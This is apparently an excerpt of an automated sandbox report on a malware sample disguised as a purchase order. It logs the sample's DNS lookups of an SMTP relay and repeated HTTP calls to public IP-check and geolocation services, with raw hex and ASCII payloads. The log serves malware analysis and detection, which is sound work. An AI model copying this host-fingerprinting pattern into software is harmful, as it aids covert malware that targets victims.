                                                                                      Apr 4, 2024 01:21:44.602540970 CEST1.1.1.1192.168.2.40x4b0cNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:21:44.602540970 CEST1.1.1.1192.168.2.40x4b0cNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:21:44.602540970 CEST1.1.1.1192.168.2.40x4b0cNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:21:44.602540970 CEST1.1.1.1192.168.2.40x4b0cNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                      • reallyfreegeoip.org
                                                                                      • scratchdreams.tk
                                                                                      • checkip.dyndns.org
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449735193.122.6.168807532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 4, 2024 01:20:57.704248905 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Apr 4, 2024 01:20:57.947427988 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:20:57 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 65e16ba6375192e2c0d3349e36e2f71e
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                                      Apr 4, 2024 01:20:57.955967903 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Apr 4, 2024 01:20:58.198860884 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:20:58 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 75cc5f0ebbab0e1f2ee66ded15988cbf
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                                                      Apr 4, 2024 01:20:58.953051090 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Apr 4, 2024 01:20:59.195441008 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:20:59 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 422b0df697b34f772593e3a4414322ea
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449738193.122.6.168807532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 4, 2024 01:21:00.010502100 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Apr 4, 2024 01:21:00.249517918 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:00 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: aaf298b2473ec11d89032b0b5f659b1a
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449740193.122.6.168807532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 4, 2024 01:21:01.075114012 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Apr 4, 2024 01:21:01.312144995 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 3e029d2a49d6f9a6f44b44fbdf939c21
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449742193.122.6.168807532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 4, 2024 01:21:02.123254061 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Apr 4, 2024 01:21:02.367398977 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:02 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: b5690ecb054e53f00e2687f38361a56b
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.449744193.122.6.168807532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 4, 2024 01:21:03.172621012 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Apr 4, 2024 01:21:03.409989119 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 1b249d0875c14c33dd6b98ff369912d2
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.449746193.122.6.168807532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 4, 2024 01:21:04.221275091 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Apr 4, 2024 01:21:04.463762999 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:04 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: cb8dd653d495f92766bc52834d5950aa
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.449748193.122.6.168807532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 4, 2024 01:21:05.280213118 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Apr 4, 2024 01:21:05.522617102 CEST324INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 107
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: c3f0fbe26dd5d51d4cb3e21ad004be40
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449736172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:20:58 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-03 23:20:58 UTC716INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:20:58 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37039
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o1v6AGj28S%2FI0WtOGZEaRCPxuO4bv73cmWstzw%2BDuTp76DrjD1KZyHIvHyN%2Ff77AHxWwa4XhsVmI%2FBbhY%2F%2FeMPrCzbmQ0zUuG3YrD3UTUlpcNXguEH7%2F98Guxfh%2BJOBE6uUjhnSR"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccad7e8786dc5-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:20:58 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:20:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449737172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:20:59 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-04-03 23:20:59 UTC712INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:20:59 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37040
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8QHZewdIgJHXgmjYMR8n03yKBtJg69I6xrrPWAwg%2FFxdjfkqHn7Emfu%2FBmdxxZHKDjWoIafaznfCCKUQilhqL%2Bt%2B4AvQSfrKQTJQlhG4O1JnJYdxb0XTaqg88pASt%2Bgo%2BLorSIE"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccadcf84e4c0d-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:20:59 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:20:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449739172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:21:00 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-04-03 23:21:00 UTC706INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:00 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37041
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q9QIkrq%2B9iWWWpgtM0lSyjlpRqLN6cGpK2wWA9fsE6v7QO6X6QWA4bRcmmOVBiEDG9o0RgMvTlYem%2BcWaRUqNTjJJfpNfR1M2IOo0R4gpCFjoN9g8t%2BTavUUOY0VQ9ziPPBEGn0f"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccae3bfd38de8-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:21:00 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:21:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449741172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:21:01 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-03 23:21:01 UTC710INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:01 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37042
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ofO7RFfBO21JQIyCS6UnOhH7xlPwtWK52Rf%2FQdAo4VeYiMub5jn%2FoPp5CXkWWbjg0eyUpYU9fpBTxu2QEY8X2gKi%2Bz%2F6YeCrlp8cxkshRyCDY6q3VRZV0VprvCKSm%2F4otAm9TnU"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccaea3bc667cf-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:21:01 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:21:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.449743172.67.177.1344437532C:\Users\user\Desktop\109__Purchase_Order.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-03 23:21:02 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-03 23:21:02 UTC712INHTTP/1.1 200 OK
                                                                                      Date: Wed, 03 Apr 2024 23:21:02 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 37043
                                                                                      Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNZJfRB4ZQm78x8kXr2XVp7OSc%2F%2BvfXvW4j0hNc%2BhTHAzq6pBF2vMSGDNbD2RXPchIqnaR%2F3InlXmHlMMaI3pth37aYIMeyBFfdfEFYt%2Fbm9IfPvFA%2BrgjY99nL7pNnm9LHRGs6S"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 86eccaf0c8604c04-MIA
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-03 23:21:02 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                      Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                      2024-04-03 23:21:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


